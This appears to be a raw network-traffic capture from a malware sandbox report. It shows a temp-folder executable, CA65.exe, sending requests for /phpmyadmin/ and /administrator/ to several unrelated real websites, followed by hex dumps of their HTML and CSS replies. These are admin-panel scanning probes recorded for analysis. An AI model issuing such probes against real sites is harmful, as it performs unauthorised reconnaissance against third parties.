_digiadmin3_session=bV0ywg24XrVQgihKMIVKFStdv%2FV2Nt%2Fafi1HejqQpcPezLWgU%2FZsRw2yhQkvI5bV6hvO7IHuw6NfgPyThwE5hZVETDjBHq7MsDZoLRb0QwW4VKxG6WFHVyCFTiyCbYEaHjfzLa9d%2BN%2FVqTM5H16nJ3CjVSnWwcNJbcxir9JUzJHc%2B9eK1c74k8Ydy58z0JdRLxd2amiTWqDsNq575C0GmOWEJ91QW5ETE4jb%2FNRBqoRlWaEth2Jwv6SncpTvMktVqbha6PFPsDiYsXYQlmBHRy2tMqg%2FXAjPjQi7--O3lCw8qckw67kYTz--SelVyWcyjgVQUknAU436LQ%3D%3D; path=/; HttpOnly; SameSite=Lax X-Request-Id: fcaca0ea-8151-4b3a-acd5-69ee32004d0f X-Runtime: 0.078620
2023-12-22 20:14:53 UTC	11415	IN	Data Raw: 38 30 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 27 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 2f 33 2f 53 72 56 37 50 38 41 73 54 48 4d 46 53 70 50 6d 59 62 79 76 32 50 6b 41 43 48 77 6d 47 39 5a 2b 31 49 46 5a 71 33 76 41 35 34 49 4e 37 70 51 63 47 6e 68 67 4e 6f 2b 38 53 4e 39 72 2f 4b 74 55 57 43 62 39 4f 50 71 54 66 57 4d 31 4e 34 77 2f 45 55 43 41 77 45 41 41 51 3d 3d 5f 4b 4d 58 58 31 77 68 45 2b 4c 71 57 6c 6e 42 4f 49 42 30 78 4a 4c 77 70 7a 58 54 56 49 56 58 77 74 50 78 42 71 6f 37 54 74 77 63 67 63 54 62 43 52 58 36 6c 67 6e 47 42 46 63 4b 53 70 64 51 51 55 37 39 39 6b 5a 30 6d 4a 4a 55 38 54 33 68 52 45 36 Data Ascii: 80b<!DOCTYPE html><html data-adblockkey='MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAL/3/SrV7P8AsTHMFSpPmYbyv2PkACHwmG9Z+1IFZq3vA54IN7pQcGnhgNo+8SN9r/KtUWCb9OPqTfWM1N4w/EUCAwEAAQ==_KMXX1whE+LqWlnBOIB0xJLwpzXTVIVXwtPxBqo7TtwcgcTbCRX6lgnGBFcKSpdQQU799kZ0mJJU8T3hRE6

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	58504	13.248.169.48	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:53 UTC	339	OUT	GET /phpmyadmin/ HTTP/1.1 Host: customizedperformance.com Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:53 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:14:53 GMT Content-Type: text/html Content-Length: 12976 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-32b0" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_QRMpUPfpzLBsnmjFgEoWtPjJM78QNZQO1E4zwpkaXX5Darpl9d4+iQFWpmnneewYLzpa9Zl3LxfuiwqSri+HEg Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:14:53 UTC	12976	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	58454	69.42.204.12	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:53 UTC	173	OUT	GET /phpmyadmin/ HTTP/1.1 Host: bldowney.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:53 UTC	164	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:53 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2023-12-22 20:14:53 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	57990	35.197.165.27	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:53 UTC	190	OUT	GET /phpmyadmin/ HTTP/1.1 Host: www.conquestaccounting.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:54 UTC	698	IN	HTTP/1.1 404 Not Found Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT content-type: text/html; charset=UTF-8 link: <https://www.conquestaccounting.com.au/wp-json/>; rel="https://api.w.org/" cache-control: no-cache, must-revalidate, max-age=0 x-cacheable: yes x-litespeed-cache-control: public,max-age=3600 x-litespeed-tag: fed_HTTP.404,fed_404,fed_URL.ba909b44cf9b50134ed01a5f820a730d,fed_ x-litespeed-cache: miss transfer-encoding: chunked date: Fri, 22 Dec 2023 20:14:54 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2023-12-22 20:14:54 UTC	670	IN	Data Raw: 31 30 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6f 6e 71 75 65 73 74 61 63 63 6f 75 6e 74 69 6e 67 2e 63 6f 6d 2e 61 75 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 Data Ascii: 10000<!DOCTYPE html><html lang="en-US" class="no-js "><head><meta charset="UTF-8" /><link rel="alternate" hreflang="en-US" href="https://www.conquestaccounting.com.au/phpmyadmin/"/><meta name='robots' content='noindex, follow' /><script type="te
2023-12-22 20:14:54 UTC	14994	IN	Data Raw: 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 63 64 6e 2d 36 34 31 62 61 35 38 31 63 31 61 63 31 61 33 35 36 38 62 36 33 33 38 38 2e 63 6c 6f 73 74 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 36 2f 30 38 2f 63 6f 6e 71 75 65 73 74 2d 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 34 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e Data Ascii: icon" /><link rel="apple-touch-icon" href="//cdn-641ba581c1ac1a3568b63388.closte.com/wp-content/uploads/2016/08/conquest-favicon.png" />... This site is optimized with the Yoast SEO plugin v21.4 - https://yoast.com/wordpress/plugins/seo/ --><title>
2023-12-22 20:14:54 UTC	16384	IN	Data Raw: 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 35 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 36 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2d 63 73 73 27 20 68 72 65 66 3d 27 2f 2f 63 64 6e 2d 36 34 31 62 61 35 38 31 63 31 61 63 31 61 33 35 36 38 62 36 33 33 38 38 2e 63 6c 6f 73 74 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2f 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 73 74 79 6c 65 73 2e 63 73 73 3f 76 65 72 3d 35 2e 38 2e 32 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 Data Ascii: e{font-size: 1.5em;line-height: 1.6;}</style><link rel='stylesheet' id='contact-form-7-css' href='//cdn-641ba581c1ac1a3568b63388.closte.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.8.2' type='text/css' media='all' /><link rel='st
2023-12-22 20:14:55 UTC	16384	IN	Data Raw: 6e 2e 61 6c 74 3a 64 69 73 61 62 6c 65 64 2c 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e 64 20 61 2e 62 75 74 74 6f 6e 2e 61 6c 74 3a 64 69 73 61 62 6c 65 64 3a 68 6f 76 65 72 2c 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e 64 20 61 2e 62 75 74 74 6f 6e 2e 61 6c 74 3a 64 69 73 61 62 6c 65 64 5b 64 69 73 61 62 6c 65 64 5d 2c 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e 64 20 61 2e 62 75 74 74 6f 6e 2e 61 6c 74 3a 64 69 73 61 62 6c 65 64 5b 64 69 73 61 62 6c 65 64 5d 3a 68 6f 76 65 72 2c 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e 64 20 62 75 74 74 6f 6e 2e 62 75 74 74 6f 6e 2e 61 6c 74 2e 64 69 73 61 62 6c 65 64 2c 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e 64 20 62 75 74 74 6f 6e 2e 62 75 74 74 6f 6e 2e 61 6c 74 2e 64 69 73 61 62 6c 65 64 3a 68 6f 76 65 72 2c 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e Data Ascii: n.alt:disabled,.button-round a.button.alt:disabled:hover,.button-round a.button.alt:disabled[disabled],.button-round a.button.alt:disabled[disabled]:hover,.button-round button.button.alt.disabled,.button-round button.button.alt.disabled:hover,.button-roun
2023-12-22 20:14:55 UTC	16384	IN	Data Raw: 2d 70 6c 61 69 6e 20 23 54 6f 70 5f 62 61 72 20 2e 77 70 6d 6c 2d 6c 61 6e 67 75 61 67 65 73 2c 2e 6d 65 6e 75 6f 2d 6e 6f 2d 62 6f 72 64 65 72 73 2e 68 65 61 64 65 72 2d 70 6c 61 69 6e 20 23 54 6f 70 5f 62 61 72 20 61 2e 61 63 74 69 6f 6e 5f 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 30 7d 2e 6d 65 6e 75 6f 2d 72 69 67 68 74 20 23 54 6f 70 5f 62 61 72 20 2e 6d 65 6e 75 5f 77 72 61 70 70 65 72 7b 66 6c 6f 61 74 3a 72 69 67 68 74 7d 2e 6d 65 6e 75 6f 2d 72 69 67 68 74 2e 68 65 61 64 65 72 2d 73 74 61 63 6b 3a 6e 6f 74 28 2e 68 65 61 64 65 72 2d 63 65 6e 74 65 72 29 20 23 54 6f 70 5f 62 61 72 20 2e 6d 65 6e 75 5f 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 35 30 70 78 7d 62 6f 64 79 2e 68 65 61 64 65 72 2d 63 72 65 61 Data Ascii: -plain #Top_bar .wpml-languages,.menuo-no-borders.header-plain #Top_bar a.action_button{border-width:0}.menuo-right #Top_bar .menu_wrapper{float:right}.menuo-right.header-stack:not(.header-center) #Top_bar .menu_wrapper{margin-right:150px}body.header-crea
2023-12-22 20:14:55 UTC	729	IN	Data Raw: 2d 66 69 78 65 64 20 23 41 63 74 69 6f 6e 5f 62 61 72 2c 2e 68 65 61 64 65 72 2d 70 6c 61 69 6e 20 23 41 63 74 69 6f 6e 5f 62 61 72 2c 2e 68 65 61 64 65 72 2d 73 70 6c 69 74 20 23 41 63 74 69 6f 6e 5f 62 61 72 2c 2e 68 65 61 64 65 72 2d 73 68 6f 70 20 23 41 63 74 69 6f 6e 5f 62 61 72 2c 2e 68 65 61 64 65 72 2d 73 68 6f 70 2d 73 70 6c 69 74 20 23 41 63 74 69 6f 6e 5f 62 61 72 2c 2e 68 65 61 64 65 72 2d 73 74 61 63 6b 20 23 41 63 74 69 6f 6e 5f 62 61 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 43 32 43 32 43 7d 23 53 6c 69 64 69 6e 67 2d 74 6f 70 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 33 66 33 66 33 7d 23 53 6c 69 64 69 6e 67 2d 74 6f 70 20 61 2e 73 6c 69 64 69 6e 67 2d 74 6f 70 2d 63 6f 6e 74 72 6f 6c 7b 62 6f 72 64 Data Ascii: -fixed #Action_bar,.header-plain #Action_bar,.header-split #Action_bar,.header-shop #Action_bar,.header-shop-split #Action_bar,.header-stack #Action_bar{background-color:#2C2C2C}#Sliding-top{background-color:#f3f3f3}#Sliding-top a.sliding-top-control{bord
2023-12-22 20:14:55 UTC	16384	IN	Data Raw: 39 64 63 62 0d 0a 2e 74 69 6d 65 6c 69 6e 65 5f 69 74 65 6d 73 2c 2e 69 63 6f 6e 5f 62 6f 78 20 61 20 2e 64 65 73 63 2c 2e 69 63 6f 6e 5f 62 6f 78 20 61 3a 68 6f 76 65 72 20 2e 64 65 73 63 2c 2e 66 65 61 74 75 72 65 5f 6c 69 73 74 20 75 6c 20 6c 69 20 61 2c 2e 6c 69 73 74 5f 69 74 65 6d 20 61 2c 2e 6c 69 73 74 5f 69 74 65 6d 20 61 3a 68 6f 76 65 72 2c 2e 77 69 64 67 65 74 5f 72 65 63 65 6e 74 5f 65 6e 74 72 69 65 73 20 75 6c 20 6c 69 20 61 2c 2e 66 6c 61 74 5f 62 6f 78 20 61 2c 2e 66 6c 61 74 5f 62 6f 78 20 61 3a 68 6f 76 65 72 2c 2e 73 74 6f 72 79 5f 62 6f 78 20 2e 64 65 73 63 2c 2e 63 6f 6e 74 65 6e 74 5f 73 6c 69 64 65 72 2e 63 61 72 6f 75 73 65 6c 20 20 75 6c 20 6c 69 20 61 20 2e 74 69 74 6c 65 2c 2e 63 6f 6e 74 65 6e 74 5f 73 6c 69 64 65 72 2e 66 6c Data Ascii: 9dcb.timeline_items,.icon_box a .desc,.icon_box a:hover .desc,.feature_list ul li a,.list_item a,.list_item a:hover,.widget_recent_entries ul li a,.flat_box a,.flat_box a:hover,.story_box .desc,.content_slider.carousel ul li a .title,.content_slider.fl
2023-12-22 20:14:55 UTC	16384	IN	Data Raw: 6e 74 5f 65 6e 74 72 69 65 73 20 75 6c 20 6c 69 3a 61 66 74 65 72 2c 2e 6d 66 6e 2d 66 6f 6f 74 65 72 20 2e 77 69 64 67 65 74 5f 6d 66 6e 5f 6d 65 6e 75 20 75 6c 20 6c 69 20 61 3a 68 6f 76 65 72 2c 2e 6d 66 6e 2d 66 6f 6f 74 65 72 20 2e 77 69 64 67 65 74 5f 70 72 6f 64 75 63 74 5f 63 61 74 65 67 6f 72 69 65 73 20 75 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 61 32 63 32 65 7d 2e 6d 66 6e 2d 66 6f 6f 74 65 72 20 2e 52 65 63 65 6e 74 5f 70 6f 73 74 73 20 75 6c 20 6c 69 20 61 20 2e 64 65 73 63 20 2e 64 61 74 65 2c 2e 6d 66 6e 2d 66 6f 6f 74 65 72 20 2e 77 69 64 67 65 74 5f 72 65 63 65 6e 74 5f 65 6e 74 72 69 65 73 20 75 6c 20 6c 69 20 2e 70 6f 73 74 2d 64 61 74 65 2c 2e 6d 66 6e 2d 66 6f 6f 74 65 72 20 2e 74 70 5f 72 65 63 65 6e 74 5f 74 Data Ascii: nt_entries ul li:after,.mfn-footer .widget_mfn_menu ul li a:hover,.mfn-footer .widget_product_categories ul{background-color:#2a2c2e}.mfn-footer .Recent_posts ul li a .desc .date,.mfn-footer .widget_recent_entries ul li .post-date,.mfn-footer .tp_recent_t
2023-12-22 20:14:55 UTC	7640	IN	Data Raw: 66 69 6e 65 64 20 3f 20 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 20 3a 20 77 69 6e 64 6f 77 2e 52 53 49 57 3b 0a 09 09 09 09 77 69 6e 64 6f 77 2e 52 53 49 48 20 3d 20 77 69 6e 64 6f 77 2e 52 53 49 48 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 20 3f 20 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 20 3a 20 77 69 6e 64 6f 77 2e 52 53 49 48 3b 0a 09 09 09 09 74 72 79 20 7b 0a 09 09 09 09 09 76 61 72 20 70 77 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 2e 63 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 6f 66 66 73 65 74 57 69 64 74 68 2c 0a 09 09 09 09 09 09 6e 65 77 68 3b 0a 09 09 09 09 09 70 77 20 3d 20 70 77 3d 3d 3d 30 20 7c 7c 20 69 73 4e 61 4e 28 70 77 29 20 7c 7c 20 28 65 2e 6c 3d 3d 22 66 75 6c 6c 77 69 64 Data Ascii: fined ? window.innerWidth : window.RSIW;window.RSIH = window.RSIH===undefined ? window.innerHeight : window.RSIH;try {var pw = document.getElementById(e.c).parentNode.offsetWidth,newh;pw = pw===0 \|\| isNaN(pw) \|\| (e.l=="fullwid

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	58542	141.193.213.10	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:53 UTC	338	OUT	GET /administrator/ HTTP/1.1 Host: jaydien.com Accept: / Accept-Encoding: deflate, gzip Cookie: __cf_bm=0_u.f76yhO0ytQ.PcL9YYZi3Mfcha.NU5TjBdG5v2mY-1703276092-1-AVbRM/E3SNz9wtbySQ545wpVXp9HkixIJLpbROCOdMp5sAEb27sBqRYGyL2a4zW4/UDgeRv5vnSiDroaJ9MhFtY= User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:54 UTC	1365	IN	HTTP/1.1 403 Forbidden Date: Fri, 22 Dec 2023 20:14:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Vary: Accept-Encoding Set-Cookie: apbct_timestamp=1703276093; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_site_landing_ts=1703276093; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_page_hits=1; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_cookies_test=%257B%2522cookies_names%2522%253A%255B%2522apbct_timestamp%2522%252C%2522apbct_site_landing_ts%2522%252C%2522apbct_page_hits%2522%255D%252C%2522check_value%2522%253A%2522a93b46864202a543689f994154287e7f%2522%257D; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_urls=%7B%22jaydien.com%2Fadministrator%2F%22%3A%5B1703276093%5D%7D; expires=Mon, 25 Dec 2023 20:14:53 GMT; Max-Age=259200; path=/; domain=jaydien.com; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_site_referer=UNKNOWN; expires=Mon, 25 Dec 2023 20:14:53 GMT; Max-Age=259200; path=/; domain=jaydien.com; secure; HttpOnly; SameSite=Lax Expires: Fri, 01 Jan 71 00:00:00 +0000 Pragma: no-cache X-Powered-By: WP Engine X-Cacheable: NO:403 Cache-Control: max-age=0, must-revalidate, private X-Cache: MISS X-Cache-Group: normal CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 839b08a1f8f812af-MIA
2023-12-22 20:14:54 UTC	32	IN	Data Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a Data Ascii: alt-svc: h3=":443"; ma=86400
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 31 66 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 27 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 70 72 69 76 61 74 65 22 3e Data Ascii: 1f9b<!DOCTYPE html><html lang='en'><head><meta charset='utf-8' /><meta name='viewport' content='width=device-width, initial-scale=1' /><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="cache-control" content="private">
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 73 20 69 6e 66 69 6e 69 74 65 20 65 61 73 65 2d 69 6e 2d 6f 75 74 20 62 6f 74 68 3b 0a 09 09 09 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 6b 2d 62 6f 75 6e 63 65 64 65 6c 61 79 20 31 2e 34 73 20 69 6e 66 69 6e 69 74 65 20 65 61 73 65 2d 69 6e 2d 6f 75 74 20 62 6f 74 68 3b 0a 09 09 7d 0a 0a 09 09 2e 73 70 69 6e 6e 65 72 20 2e 62 6f 75 6e 63 65 31 20 7b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 33 32 73 3b 0a 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 33 32 73 3b 0a 09 09 7d 0a 0a 09 09 2e 73 70 69 6e 6e 65 72 20 2e 62 6f 75 6e 63 65 32 20 7b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 31 36 73 3b 0a 09 09 09 61 6e 69 6d 61 74 69 6f Data Ascii: s infinite ease-in-out both;animation: sk-bouncedelay 1.4s infinite ease-in-out both;}.spinner .bounce1 {-webkit-animation-delay: -0.32s;animation-delay: -0.32s;}.spinner .bounce2 {-webkit-animation-delay: -0.16s;animatio
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 30 37 33 61 61 3b 0a 09 09 7d 0a 09 09 61 3a 68 6f 76 65 72 2c 0a 09 09 61 3a 61 63 74 69 76 65 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 30 36 37 39 39 3b 0a 09 09 7d 0a 09 09 61 3a 66 6f 63 75 73 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 31 32 34 39 36 34 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 0a 09 09 09 09 09 30 20 30 20 30 20 31 70 78 20 23 35 62 39 64 64 39 2c 0a 09 09 09 09 09 30 20 30 20 32 70 78 20 31 70 78 20 72 67 62 61 28 33 30 2c 20 31 34 30 2c 20 31 39 30 2c 20 30 2e 38 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 0a 09 09 09 09 09 30 20 30 20 30 20 31 70 78 20 23 35 Data Ascii: ;font-size: 14px ;}a {color: #0073aa;}a:hover,a:active {color: #006799;}a:focus {color: #124964;-webkit-box-shadow:0 0 0 1px #5b9dd9,0 0 2px 1px rgba(30, 140, 190, 0.8);box-shadow:0 0 0 1px #5
